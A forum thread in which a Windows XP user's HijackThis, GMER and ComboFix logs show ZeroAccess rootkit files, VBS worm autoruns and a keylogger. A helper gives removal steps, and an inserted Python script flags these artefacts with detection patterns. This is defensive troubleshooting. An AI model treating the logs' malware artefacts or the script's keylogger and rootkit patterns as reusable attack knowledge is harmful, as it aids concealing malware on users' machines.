Trojan.KillAV and PUM.Hijack.Regedit


  • This topic is locked
57 replies to this topic

#1 worries

  • Members
  • 47 posts

Posted 12 May 2012 - 11:45 AM

Hi there,
I have a gateway netbook running on XP.

Mbam tells me I have Trojan.KillAV and Pum.Hijack.Regedit, and they come back after removal on startup (even in safe mode).

I am also having some weird browser issues. Firefox closes down if I search certain things on google. E.g., when I search "Forum tech guy" and click on "Virus & Other Malware Removal", the browser closes. But doesn't if I click on any other part of the forum. Same thing happens if I google "Trojan Kill.AV removal tool" and click on a site.

Also, I have intermittent wireless connection to the internet. If I use windows restore and go back to a point where the internet was working, it works fine for 20 mins and then stops connecting to the internet. But my wireless has no trouble detecting signals. I figure it is associated with viruses because no other device is having trouble connecting to the internet.

Here are the logs, but the post is too long so I have to attach some. Thank you

HijackThis

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 3:03:02 PM, on 11/05/2012
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTMon.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\svchost.exe
C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\uagqecsvc.exe
C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe
C:\PROGRA~1\LAUNCH~1\LManager.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\system32\igfxsrvc.exe
C:\WINDOWS\PLFSetL.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\ViStart\ViStart.exe
C:\Documents and Settings\Annie\Application Data\Dropbox\bin\Dropbox.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\igfxext.exe
C:\WINDOWS\system32\regsrv.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Annie\My Documents\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.gateway.com/rdr.aspx?b=ACGW&l=1009&m=lt20&r=0xph0511x415l03c4wuj5a48l2u599
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.gateway.com/rdr.aspx?b=ACGW&l=1009&m=lt20&r=0xph0511x415l03c4wuj5a48l2u599
F1 - win.ini: run=C:\WINDOWS\system32\mouse_configurator.win
O2 - BHO: Increase performance and video formats for your HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Use the DivX Plus Web Player to watch web videos with less interruptions and smoother playback on supported sites - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~3\Office12\GRA8E1~1.DLL
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O4 - HKLM\..\Run: [IAAnotif] C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe
O4 - HKLM\..\Run: [LManager] C:\PROGRA~1\LAUNCH~1\LManager.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [AzMixerSel] C:\Program Files\Realtek\Audio\Drivers\AzMixerSel.exe
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [PLFSetL] C:\WINDOWS\PLFSetL.exe
O4 - HKLM\..\Run: [snp2uvc] rundll32.exe C:\WINDOWS\system32\csnp2uvc.dll,ResetCIDS
O4 - HKLM\..\Run: [PLFSetI] C:\Program Files\PLFSetI.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [Israfel] C:\WINDOWS\system32\Israfel.vbs
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Facebook Update] "C:\Documents and Settings\Annie\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
O4 - HKCU\..\Run: [AttachmentWiperiportal.sickkids.ca] "C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\AttachmentWiper.exeBatchRun\run.bat"
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [ViStart] C:\Program Files\ViStart\ViStart.exe
O4 - HKCU\..\Run: [Google Update] "C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c
O4 - HKCU\..\Run: [freeklogger.exe] C:\Program Files\FK_Monitor\freeklogger.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: Dropbox.lnk = C:\Documents and Settings\Annie\Application Data\Dropbox\bin\Dropbox.exe
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_D183CA64F05FDD98.dll/cmsidewiki.html
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos-beta/OnlineScanner.cab
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~3\Office12\GR99D3~1.DLL
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: Intel® Matrix Storage Event Monitor (IAANTMON) - Intel Corporation - C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTMon.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe

--
End of file - 7687 bytes

ARK
GMER 1.0.15.15641 - http://www.gmer.net
Rootkit scan 2012-05-12 04:08:08
Windows 5.1.2600 Service Pack 3 Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-0 ST916031 rev.0001
Running: t4v5pmm0.exe; Driver: C:\DOCUME~1\Annie\LOCALS~1\Temp\kwldqpow.sys


---- User code sections - GMER 1.0.15 ----

.text C:\Program Files\Mozilla Firefox\firefox.exe[2572] ntdll.dll!LdrLoadDll 7C9163C3 5 Bytes JMP 01262EC0 C:\Program Files\Mozilla Firefox\xul.dll (Mozilla Foundation)

---- Devices - GMER 1.0.15 ----

AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 wdf01000.sys (WDF Dynamic/Microsoft Corporation)
AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 wdf01000.sys (WDF Dynamic/Microsoft Corporation)

Device mrxsmb.sys (Windows NT SMB Minirdr/Microsoft Corporation)

---- Registry - GMER 1.0.15 ----

Reg HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted@C:\Acer\ScreenSaver\screensaver_lt_1024_gtw_1.1.0722.exe 1

---- Files - GMER 1.0.15 ----

File C:\WINDOWS\$NtUninstallKB15745$\2326153432 0 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\@ 2048 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\click.tlb 2144 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\L 0 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\L\baxleibp 455296 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\loader.tlb 2540 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U 0 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@00000001 45968 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@000000c0 3584 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@000000cb 3072 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@000000cf 1536 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@80000000 26112 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@800000c0 35840 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@800000cb 27648 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@800000cf 27648 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2483834660 0 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432 0 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\@ 2048 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\cfg.ini 63 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\Desktop.ini 4608 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\L 0 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\L\baxleibp 138112 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U 0 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\00000001.@ 2048 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\00000002.@ 224768 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\00000004.@ 1024 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\80000000.@ 66560 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\80000004.@ 12800 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\80000032.@ 73216 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\version 856 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2815177502 0 bytes
ADS C:\WINDOWS\3628639882:1968813863.exe 816 bytes executable

---- EOF - GMER 1.0.15 ----

Attached Files




#2 B-boy/StyLe/

    Bleepin' Freestyler

  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria

Posted 12 May 2012 - 12:04 PM

Hello worries! Welcome to BleepingComputer Forums!

My name is Georgi and I will be helping you with your computer problems.

Before we begin, please note the following:
  • I will be working on your malware issues; this may or may not solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. The absence of symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something, don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.





IMPORTANT NOTE: One or more of the identified infections is related to the rootkit ZeroAccess. Rootkits, backdoor Trojans, botnets, and IRCBots are very dangerous because they compromise system integrity by making changes that allow the machine to be used by the attacker for malicious purposes. Rootkits are used by Trojans to conceal their presence (hide from view) in order to prevent detection of an attacker's software and make removal more difficult. Many rootkits can hook into the Windows 32-bit kernel and patch several APIs to hide new registry keys and files they install. They can disable your anti-virus and security tools to prevent detection and removal. Remote attackers use backdoors as a means of accessing and taking control of a computer that bypasses security mechanisms. This type of exploit allows them to steal sensitive information like passwords, personal and financial data, which is sent back to the hacker. To learn more about these types of infections, you can refer to:

If your computer was used for online banking, has credit card information or other sensitive data on it, you should stay disconnected from the Internet until your system is fully cleaned. All passwords should be changed immediately, including those used for banking, email, eBay, PayPal and online forums. You should consider them to be compromised and change each password using a clean computer, not the infected one. If not, an attacker may get the new passwords and transaction information. If using a router, you need to reset it with a strong logon/password so the malware cannot gain control before you connect again. Banking and credit card institutions should be notified of the possible security breach. Because your computer was compromised, please read:

Although the infection has been identified and may be removed, your PC has likely been compromised and there is no way to be sure the computer can ever be trusted again. It is dangerous and incorrect to assume the computer is secure even if the malware appears to have been removed. In some instances an infection may have caused so much damage to your system that it cannot be completely cleaned or repaired, so you can never be sure that you have completely removed a rootkit. The malware may leave so many remnants behind that security tools cannot find them. Tools that claim to be able to remove rootkits cannot guarantee that all traces of it will be removed. Many experts in the security community believe that once infected with this type of malware, the best course of action is to wipe the drive clean, reformat and reinstall the OS. Please read:




We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. If you decide to continue please do this:


Please download ComboFix from the link below:

Combofix

Save it to your Desktop <-- Important!!!

  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. Please refer to this link for instructions.

  • Double click it & follow the prompts.

  • As part of its process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. With malware infections being as they are today, it's strongly recommended to have this pre-installed on your machine before doing any malware removal. It will allow you to boot up into a special recovery/repair mode that will allow us to more easily help you should your computer have a problem after an attempted removal of malware.

  • Follow the prompts to allow ComboFix to download and install the Microsoft Windows Recovery Console, and when prompted, agree to the End-User License Agreement to install the Microsoft Windows Recovery Console.

**Please note: If the Microsoft Windows Recovery Console is already installed, ComboFix will continue its malware removal procedures.


Once the Microsoft Windows Recovery Console is installed using ComboFix, you should see the following message:

[screenshot of the ComboFix prompt not reproduced]

Click on Yes, to continue scanning for malware.

When finished, it will produce a log for you. Please include the C:\ComboFix.txt in your next reply.



Regards,
Georgi

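The two logs in the opening post and Georgi's note read together give a short triage checklist: an `O4` Run entry that launches a `.vbs` or `.bat` (here `Israfel.vbs`, and the batch file under the Forefront UAG agent folder, which the rule reports and leaves to the reader to clear), the legacy `win.ini` `run=` loader pointing at `mouse_configurator.win`, the `O7` DisableRegedit=1 policy that Malwarebytes names PUM.Hijack.Regedit, an autorun whose name says "logger" (`FK_Monitor\freeklogger.exe`), and, in the GMER file list, the container layout the ZeroAccess note refers to: a fake `$NtUninstallKBnnnnn$` folder holding an all-digit subfolder with an `@` file and `L\` and `U\` subfolders, plus an alternate data stream on a numeric file name directly under C:\WINDOWS. The Python script below is an added example written for this thread; it is not part of HijackThis, GMER, Malwarebytes or ComboFix. The sample lines are copied from the posted logs; the keyword list and the "`@` plus `L` plus `U`" layout rule are the example's own assumptions.

```python
"""Triage the HijackThis and GMER lines posted in this thread.

Added example, not a tool from the thread. Sample lines are copied from the
posted logs; the keyword list and the directory-layout rule are this script's
own assumptions.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the HijackThis lines posted above.
HJT_SAMPLE = [
    r"F1 - win.ini: run=C:\WINDOWS\system32\mouse_configurator.win",
    r"O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe",
    r'O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"',
    r"O4 - HKLM\..\Run: [Israfel] C:\WINDOWS\system32\Israfel.vbs",
    r'O4 - HKCU\..\Run: [Facebook Update] "C:\Documents and Settings\Annie\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver',
    r'O4 - HKCU\..\Run: [AttachmentWiperiportal.sickkids.ca] "C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\AttachmentWiper.exeBatchRun\run.bat"',
    r"O4 - HKCU\..\Run: [freeklogger.exe] C:\Program Files\FK_Monitor\freeklogger.exe",
    r"O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1",
]

# Constructed sample: a subset of the GMER 'Files' section posted above.
GMER_SAMPLE = [
    r"File C:\WINDOWS\$NtUninstallKB15745$\2326153432 0 bytes",
    r"File C:\WINDOWS\$NtUninstallKB15745$\2326153432\@ 2048 bytes",
    r"File C:\WINDOWS\$NtUninstallKB15745$\2326153432\click.tlb 2144 bytes",
    r"File C:\WINDOWS\$NtUninstallKB15745$\2326153432\L\baxleibp 455296 bytes",
    r"File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@00000001 45968 bytes",
    r"File C:\WINDOWS\$NtUninstallKB15745$\2483834660 0 bytes",
    r"File C:\WINDOWS\$NtUninstallKB49790$\2326153432\@ 2048 bytes",
    r"File C:\WINDOWS\$NtUninstallKB49790$\2326153432\cfg.ini 63 bytes",
    r"File C:\WINDOWS\$NtUninstallKB49790$\2326153432\L\baxleibp 138112 bytes",
    r"File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\00000002.@ 224768 bytes",
    r"ADS C:\WINDOWS\3628639882:1968813863.exe 816 bytes executable",
]

SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".bat", ".cmd")
SUSPECT_WORDS = ("keylog", "logger")  # assumption: names worth a second look

O4_RE = re.compile(r"^O4 - (?P<hive>.+?)\\\.\.\\Run: \[(?P<name>[^\]]*)\] (?P<cmd>.+)$")
F1_RE = re.compile(r"^F1 - win\.ini: run=(?P<cmd>.+)$")
O7_RE = re.compile(r"^O7 - (?P<key>.+), DisableRegedit=1$")
# First file on the command line, quoted or not, followed by a space or end of line.
PATH_RE = re.compile(
    r'^"?(?P<p>.+?\.(?:exe|com|scr|dll|vbs|vbe|js|jse|wsf|hta|bat|cmd))"?(?:\s|$)', re.I)
GMER_RE = re.compile(r"^(?P<kind>File|ADS) (?P<path>.+?) (?P<size>\d+) bytes")
# <fake KB dir>\<all digits>\<child>; the child name is what we group on.
ZA_RE = re.compile(r"\\\$NtUninstallKB\d+\$\\(?P<sub>\d+)(?:\\(?P<child>[^\\]+))?", re.I)
ADS_RE = re.compile(r"\\\d+:\d+\.exe$", re.I)


def launched_path(cmd: str) -> str:
    """Extract the file a Run command starts (quotes and trailing arguments dropped)."""
    m = PATH_RE.match(cmd.strip())
    return m.group("p") if m else cmd.strip()


def triage_hijackthis(lines):
    """Return (category, detail) pairs for the autorun lines worth a second look."""
    findings = []
    for line in lines:
        if (m := O7_RE.match(line)):
            findings.append(("regedit-disabled", m.group("key")))
        elif (m := F1_RE.match(line)):
            # win.ini run= is a Windows 3.x loader that XP still honours;
            # few legitimate programs still use it.
            findings.append(("winini-run", m.group("cmd")))
        elif (m := O4_RE.match(line)):
            path = launched_path(m.group("cmd"))
            low = path.lower()
            if low.endswith(SCRIPT_EXT):
                findings.append(("script-autorun", path))
            elif any(w in low for w in SUSPECT_WORDS):
                findings.append(("suspect-name", path))
    return findings


def triage_gmer_files(lines):
    """Flag ZeroAccess-style containers and executable alternate data streams."""
    children = defaultdict(set)
    findings = []
    for line in lines:
        m = GMER_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        if m.group("kind") == "ADS":
            if ADS_RE.search(path):
                findings.append(("ads-executable", path))
            continue
        z = ZA_RE.search(path)
        if z and z.group("child"):
            children[path[:z.end("sub")]].add(z.group("child"))
    for base, kids in sorted(children.items()):
        # Assumption (matches the posted listing): the '@' file together with
        # the 'L' and 'U' subfolders is the marker, not the fake KB name alone.
        if {"@", "L", "U"} <= kids:
            findings.append(("zeroaccess-layout", base))
    return findings


if __name__ == "__main__":
    for cat, detail in triage_hijackthis(HJT_SAMPLE) + triage_gmer_files(GMER_SAMPLE):
        print(f"{cat:18} {detail}")
```

On the posted lines this reports five HijackThis findings (the win.ini loader, the two script autoruns, the keylogger-named autorun and the regedit policy) and three GMER findings (both fake-KB containers and the numeric ADS executable). Note that the `regsrv.exe` seen in the running-process list has no autorun entry in the HijackThis output, which is consistent with it being started by the script rather than by the registry.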


#3 worries

  • Topic Starter
  • Members
  • 47 posts

Posted 12 May 2012 - 01:19 PM

Hi,
here it is. But the file is too big to attach. And the copied version is too long to post. So I am going to post it here in parts.

Part1:

ComboFix 12-05-12.01 - Annie 12/05/2012 13:57:13.1.2 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.2.1033.18.1014.747 [GMT -4:00]
Running from: c:\documents and settings\Annie\Desktop\ComboFix.exe
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\Annie\Local Settings\Application Data\8aa648d8\U
c:\documents and settings\Annie\Local Settings\Application Data\8aa648d8\U\800000cb.@
c:\documents and settings\Annie\Local Settings\Application Data\aavu.exe
c:\documents and settings\Annie\Local Settings\Application Data\gmlb.exe
c:\documents and settings\Annie\Local Settings\Application Data\jlmd.exe
c:\documents and settings\Annie\Local Settings\Application Data\nclp.exe
c:\documents and settings\Annie\Local Settings\Application Data\nlvw.exe
c:\documents and settings\Annie\Local Settings\Application Data\shym.exe
c:\documents and settings\Annie\Local Settings\Application Data\wayd.exe
c:\documents and settings\Annie\Local Settings\Application Data\xtie.exe
c:\windows\$NtUninstallKB15745$
c:\windows\$NtUninstallKB15745$\2326153432\@
c:\windows\$NtUninstallKB15745$\2326153432\click.tlb
c:\windows\$NtUninstallKB15745$\2326153432\L\baxleibp
c:\windows\$NtUninstallKB15745$\2326153432\loader.tlb
c:\windows\$NtUninstallKB15745$\2326153432\U\@00000001
c:\windows\$NtUninstallKB15745$\2326153432\U\@000000c0
c:\windows\$NtUninstallKB15745$\2326153432\U\@000000cb
c:\windows\$NtUninstallKB15745$\2326153432\U\@000000cf
c:\windows\$NtUninstallKB15745$\2326153432\U\@80000000
c:\windows\$NtUninstallKB15745$\2326153432\U\@800000c0
c:\windows\$NtUninstallKB15745$\2326153432\U\@800000cb
c:\windows\$NtUninstallKB15745$\2326153432\U\@800000cf
c:\windows\$NtUninstallKB15745$\2483834660
c:\windows\$NtUninstallKB49790$
c:\windows\$NtUninstallKB49790$\2326153432\@
c:\windows\$NtUninstallKB49790$\2326153432\cfg.ini
c:\windows\$NtUninstallKB49790$\2326153432\Desktop.ini
c:\windows\$NtUninstallKB49790$\2326153432\L\baxleibp
c:\windows\$NtUninstallKB49790$\2326153432\U\00000001.@
c:\windows\$NtUninstallKB49790$\2326153432\U\00000002.@
c:\windows\$NtUninstallKB49790$\2326153432\U\00000004.@
c:\windows\$NtUninstallKB49790$\2326153432\U\80000000.@
c:\windows\$NtUninstallKB49790$\2326153432\U\80000004.@
c:\windows\$NtUninstallKB49790$\2326153432\U\80000032.@
c:\windows\$NtUninstallKB49790$\2326153432\version
c:\windows\$NtUninstallKB49790$\2815177502
c:\windows\system32\regsrv.exe
.
.
((((((((((((((((((((((((( Files Created from 2012-04-12 to 2012-05-12 )))))))))))))))))))))))))))))))
.
.
2012-05-12 17:38 . 2012-05-12 17:38 -------- d-----w- c:\windows\system32\wbem\Repository
2012-05-12 08:24 . 2012-05-12 08:24 -------- d-----w- c:\documents and settings\Administrator\Local Settings\Application Data\Mozilla
2012-05-11 14:21 . 2012-05-11 14:21 -------- d-----w- c:\documents and settings\Administrator\Application Data\Malwarebytes
2012-05-11 13:16 . 2012-05-11 13:16 -------- d-----w- c:\documents and settings\Annie\Application Data\QuickScan
2012-05-11 00:29 . 2012-05-11 00:29 -------- d-----w- c:\program files\Java
2012-05-11 00:29 . 2012-05-11 00:29 -------- d-----w- c:\program files\Common Files\Java
2012-05-11 00:19 . 2012-05-11 00:20 -------- d-----w- C:\temp
2012-05-11 00:19 . 2012-05-11 00:19 -------- d-----w- c:\documents and settings\All Users\Application Data\Atheros
2012-05-11 00:15 . 2012-05-11 00:15 -------- d-----w- c:\documents and settings\All Users\Application Data\Broadcom
2012-05-10 17:15 . 2012-05-10 17:15 -------- d-----w- c:\documents and settings\Annie\Application Data\FK_Monitor
2012-05-02 03:56 . 2012-05-02 05:44 -------- d-----w- c:\program files\FK_Monitor
2012-04-25 04:01 . 2012-05-10 17:15 -------- d-----w- c:\program files\ZAR
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-03-01 14:42 . 2011-12-21 05:50 272349 ----a-w- c:\windows\system32\hta.vbs
2012-03-01 14:42 . 2011-12-05 17:26 272349 ----a-w- c:\windows\system32\Israfel.vbs
2012-03-01 14:42 . 2011-12-05 17:26 272349 ----a-w- c:\windows\system32\GEDZAC.vbs
2012-03-01 14:42 . 2011-12-05 17:26 272349 ----a-w- c:\windows\system32\File.vbs
2011-11-11 15:22 . 2011-05-06 05:03 134104 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2011-02-18 05:12 94208 ----a-w- c:\documents and settings\Annie\Application Data\Dropbox\bin\DropboxExt.14.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2011-02-18 05:12 94208 ----a-w- c:\documents and settings\Annie\Application Data\Dropbox\bin\DropboxExt.14.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2011-02-18 05:12 94208 ----a-w- c:\documents and settings\Annie\Application Data\Dropbox\bin\DropboxExt.14.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
